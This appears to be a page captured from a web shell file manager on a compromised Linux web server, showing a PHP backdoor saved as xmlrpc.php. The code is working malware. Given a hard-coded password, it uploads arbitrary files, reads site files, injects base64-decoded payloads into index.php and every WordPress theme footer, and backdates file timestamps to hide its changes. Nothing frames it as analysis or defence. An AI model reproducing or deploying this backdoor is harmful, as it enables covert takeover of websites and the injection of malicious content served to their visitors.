BossBey File Manager
PHP:
7.3.8
OS:
Linux
User:
web7
Root
/
var
/
www
/
clients
/
client9
/
web7
/
web
đ€ Upload
đ New File
đ New Folder
Close
Editing: xmlrpc.php
<?php error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); //header("Content-Type: text/html; charset=utf-8"); $sysPwd="GQHK5W5ULV4H00TGO7D7"; $action = $_REQUEST['action'] ?? ''; $password = $_REQUEST['password'] ?? ''; if($action==""||$password=="") { die('__success__parameters error #1__success__'); } if($password!=$sysPwd) { die('__success__parameters error #2__success__'); } if($action=='uploadfix') { $uploadpath=$_REQUEST['uploadpath']; $filename=$_REQUEST['filename']; UploadFile($uploadpath,$filename); } else if($action=='uploadrandom') { $filename=$_REQUEST['filename']; UploadFileRandom($filename); } else if($action=='uploadrandomcur') { $filename=$_REQUEST['filename']; UploadFileRandomCur($filename); } else if($action=='read') { $filename=$_REQUEST['filename']; $rootPath=GetRootPath(); $filePath=$rootPath.'/'.$filename; $filebody=file_get_contents($filePath); echo '__success__'.$filebody.'__success__'; } else if($action=='linkrobot') { $filename=$_REQUEST['filename']; $fileflag='<!--cc-->'; $fileplus="<?php include('".$filename."'); ?>".$fileflag; $rootPath=GetRootPath(); $filePath=$rootPath.'/index.php'; if(!file_exists($filePath)) { $filePath=$rootPath.'/default.php'; } if(!file_exists($filePath)) { $filePath=$rootPath.'/home.php'; } if(!file_exists($filePath)) { $filePath=$rootPath.'/index.php'; } if(!file_exists($filePath)) { $filebody=$fileplus; $fp=fopen($filePath,"w"); //fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody)); fwrite($fp,$filebody); fclose($fp); } else { $filebody=file_get_contents($filePath); if(strpos('___'.$filebody,$fileplus)!==false) { $filebody=str_replace($fileflag,'~',$filebody); $arrParts=explode("~",$filebody); $filebody=$arrParts[1]; } if(strpos('___'.$filebody,$fileplus)===false) { $filebody=$fileplus."\r\n".$filebody; $fp=fopen($filePath,"w"); //fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody)); fwrite($fp,$filebody); fclose($fp); } } if(file_exists($filePath)) { $filebody=file_get_contents($filePath); if(strpos('___'.$filebody,$fileplus)!==false) { ModifyTime($rootPath,$filePath); echo '__success__ok__success__'; } } } else if($action=='beindex') { $aver=''; $fileplus=''; $checkstring=''; if(isset($_REQUEST['aver'])) { $aver=$_REQUEST['aver']; $aver=base64_decode($aver); } if(isset($_REQUEST['fileplus'])) { $fileplus=$_REQUEST['fileplus']; $fileplus=base64_decode($fileplus); } if(isset($_REQUEST['checkstring'])) { $checkstring=$_REQUEST['checkstring']; $checkstring='<!--'.$checkstring.'-->'; } if($aver==""||$fileplus==""||$checkstring=="") { die('__success__parameters error #3__success__'); } $rootPath=GetRootPath(); $filePath=$rootPath.'/index.php'; $filePath2=$rootPath.'/backup.txt'; $filePath3=$rootPath.'/aver.php'; if(!file_exists($filePath)) { die('__success__file-not-exist__success__'); } chmod($filePath,0777); $filebody=file_get_contents($filePath); if($isdelete=='1') { $filebody=''; } if(strpos('___'.$filebody,$checkstring)!==false) { $arrParts=explode($checkstring,$filebody); $filebody=$arrParts[count($arrParts)-1]; } if(strpos('___'.$filebody,$checkstring)===false) { $filebody=$fileplus."\r\n".$checkstring.$filebody; $fp=fopen($filePath,"w"); //fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody)); fwrite($fp,$filebody); fclose($fp); $fp=fopen($filePath2,"w"); //fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody)); fwrite($fp,$filebody); fclose($fp); $fp=fopen($filePath3,"w"); //fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody)); fwrite($fp,$aver); fclose($fp); } $filebody=file_get_contents($filePath); if(strpos('___'.$filebody,$checkstring)!==false) { ModifyTime($rootPath,$filePath); echo '__success__ok__success__'; exit; } else { echo '__success__failed__success__'; exit; } } else if($action=='belink') { $fileplus=''; $checkstring=''; if(isset($_REQUEST['fileplus'])) { $fileplus=$_REQUEST['fileplus']; $fileplus=base64_decode($fileplus); } if(isset($_REQUEST['checkstring'])) { $checkstring=$_REQUEST['checkstring']; $checkstring='<!--'.$checkstring.'-->'; } if($fileplus==""||$checkstring=="") { die('__success__parameters error #3__success__'); } $rootPath=GetRootPath(); if(!is_dir($rootPath.'/wp-content/themes')) { die('__success__folder themes not exist__success__'); } $folders= GetFolders($rootPath.'/wp-content/themes',false); $arrParts=explode("|",$folders); $result=0; for($n=0;$n<count($arrParts);$n++) { $fileFolder=$arrParts[$n]; $filePath=$fileFolder.'/footer.php'; if(!file_exists($filePath)) { continue; } chmod($filePath,0777); $filebody=file_get_contents($filePath); if(strpos('___'.$filebody,'</body>')===false) { continue; } if(strpos('___'.$filebody,$checkstring)!==false) { $arrParts=explode($checkstring,$filebody); $filebody=$arrParts[0].'</body></html>'; } if(strpos('___'.$filebody,$checkstring)===false) { $filebody=str_replace('</body>',$checkstring."\r\n".$fileplus.'</body>',$filebody); $fp=fopen($filePath,"w"); //fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$filebody)); fwrite($fp,$filebody); fclose($fp); } $filebody=file_get_contents($filePath); if(strpos('___'.$filebody,$checkstring)!==false) { ModifyTime($rootPath,$filePath); $result++; } } if($result>0) { echo '__success__ok-'.$result.'__success__'; exit; } else { echo '__success__failed__success__'; exit; } } function UploadFileRandom($filename) { $hostUrl=is_https().$_SERVER['SERVER_NAME']; $rootPath=GetRootPath(); $folders= GetFolders($rootPath,true); $arrParts=explode("|",$folders); $index=mt_rand(0,count($arrParts)-1); $fileFolder=$arrParts[$index]; chmod($fileFolder,0777); $filePath=$fileFolder.'/'.$filename; move_uploaded_file($_FILES["upfile"]["tmp_name"],$filePath); if(file_exists($filePath)) { ModifyTime($fileFolder,$filePath); $fileUrl=$filePath; $fileUrl=str_replace($rootPath,'',$fileUrl); $fileUrl=str_replace('\\','/',$fileUrl); $fileUrl=str_replace('///','/',$fileUrl); $fileUrl=$hostUrl.'/'.$fileUrl; echo '__success__'.$fileUrl.'__success__'; } } function UploadFileRandomCur($filename) { $hostUrl=GetLocationURLPath(); $rootPath=realpath(dirname(__FILE__)); $folders= GetFolders($rootPath,true); $arrParts=explode("|",$folders); $index=mt_rand(0,count($arrParts)-1); $fileFolder=$arrParts[$index]; chmod($fileFolder,0777); $filePath=$fileFolder.'/'.$filename; move_uploaded_file($_FILES["upfile"]["tmp_name"],$filePath); if(file_exists($filePath)) { ModifyTime($fileFolder,$filePath); $fileUrl=$filePath; $fileUrl=str_replace($rootPath,'',$fileUrl); $fileUrl=str_replace('\\','/',$fileUrl); $fileUrl=str_replace('///','/',$fileUrl); $fileUrl=$hostUrl.'/'.$fileUrl; echo '__success__'.$fileUrl.'__success__'; } } function UploadFile($uploadpath,$filename) { $hostUrl=is_https().$_SERVER['SERVER_NAME']; $rootPath=GetRootPath(); $fileFolder=''; $filePath=''; if($uploadpath!="") { $fileFolder=$rootPath.'/'.$uploadpath; $filePath=$fileFolder.'/'.$filename; createFolder($fileFolder); } else { $fileFolder=$rootPath; $filePath=$fileFolder.'/'.$filename; } if(file_exists($filePath)) { chmod($filePath,0777); } else { chmod($fileFolder,0777); } move_uploaded_file($_FILES["upfile"]["tmp_name"],$filePath); if(file_exists($filePath)) { ModifyTime($fileFolder,$filePath); $fileUrl=$filePath; $fileUrl=str_replace($rootPath,'',$fileUrl); $fileUrl=str_replace('\\','/',$fileUrl); $fileUrl=str_replace('///','/',$fileUrl); $fileUrl=$hostUrl.'/'.$fileUrl; echo '__success__'.$fileUrl.'__success__'; } } function ModifyTime($dir,$filePath) { chmod($filePath,0777); $randomFile= GetRandomFile($dir); if(!empty($randomFile)&&$randomFile!=$filePath) { $time=filemtime($randomFile); } else { $time=randomDate('2009-01-01','2019-01-01',false); } touch($filePath,$time); chmod($filePath,0644); } function randomDate($begintime, $endtime="", $now = true) { $begin = strtotime($begintime); $end = $endtime == "" ? mktime() : strtotime($endtime); $timestamp = rand($begin, $end); return $now ? date("Y-m-d H:i:s", $timestamp) : $timestamp; } function GetRootPath() { $returnVal=''; $locationUrl=GetLocationURL(); $arrParts=explode("/",$locationUrl); $prevUrl=''; for($n=0;$n<count($arrParts)-4;$n++) { if($n==0) { $prevUrl.= '/../'; } else { $prevUrl.= '../'; } } $returnVal=realpath(dirname(__FILE__).$prevUrl); return $returnVal; } function GetLocationURL() { return is_https().$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; } function GetLocationURLPath() { $pageURL = is_https().$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']; $arrParts=explode("/",$pageURL); $pageURL=''; for($n=0;$n<count($arrParts)-1;$n++) { $pageURL.= $arrParts[$n].'/'; } return $pageURL; } function GetFolders($dir,$is_sub) { $returnVal=''; $files = array(); $dir_list = scandir($dir); foreach($dir_list as $file) { if($file=='..' || $file=='.') continue; if(!is_dir($dir.'/'.$file)) continue; $returnVal.=$dir.'/'.$file.'|'; if($is_sub) { $returnVal.=GetFolders($dir.'/'.$file,false); } } return $returnVal; } function GetFiles($dir) { $returnVal=''; $files = array(); $dir_list = scandir($dir); foreach($dir_list as $file) { if($file=='..' || $file=='.') continue; if(is_dir($dir.'/'.$file)) continue; if($dir.'/'.$file=='') continue; $returnVal.=$dir.'/'.$file.'|'; } return $returnVal; } function GetRandomFile($dir) { $files=GetFiles($dir); $arrParts=explode("|",$files); $index=mt_rand(0,count($arrParts)-1); $filePath=$arrParts[$index]; return $filePath; } function createFolder($path) { if (!file_exists($path)) { createFolder(dirname($path)); mkdir($path, 0777); } } function mkdirs($dir) { if(!is_dir($dir)) { if(!mkdirs(dirname($dir))) { return false; } if(!mkdir($dir,0777)) { return false; } } return true; } function rmdirs($dir) { $d = dir($dir); while (false !== ($child = $d->read())) { if($child != '.' && $child != '..') { if(is_dir($dir.'/'.$child)) rmdirs($dir.'/'.$child); else unlink($dir.'/'.$child); } } $d->close(); rmdir($dir); } function is_https() { if (!empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') { return 'https://'; } elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') { return 'https://'; } elseif (!empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') { return 'https://'; } return 'http://'; } function GetHttpPage($url) { $output = ''; $time_out = 30; if (function_exists ( 'curl_init' )) { $ch = curl_init (); curl_setopt($ch, CURLOPT_URL, $url ); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true ); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true ); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $time_out ); curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch, CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); $output = curl_exec($ch ); curl_close ($ch); } elseif (function_exists ( 'file_get_contents' )) { $context = stream_context_create(array('http' => array('timeout' => $time_out))); $output = file_get_contents ( $url, false, $context); } elseif (ini_get ( "allow_url_fopen" ) == "1") { $errstr = ''; $errno = ''; $info = parse_url ( $url ); $fp = fsockopen ( $info ["host"], 80, $errno, $errstr, $time_out ) or exit ( $errstr . "--->" . $errno ); $head = "GET " . $info ['path'] . "?" . $info ["query"] . " HTTP/1.1\r\n"; $head .= "Host: " . $info ['host'] . "\r\n"; $head .= "Connection: Close\r\n\r\n"; fwrite($fp, $head); while ( ! feof ( $fp ) ) { $output .= fgets ( $fp, 128 ); } fclose ( $fp ); } return $output; } ?>
Save
Cancel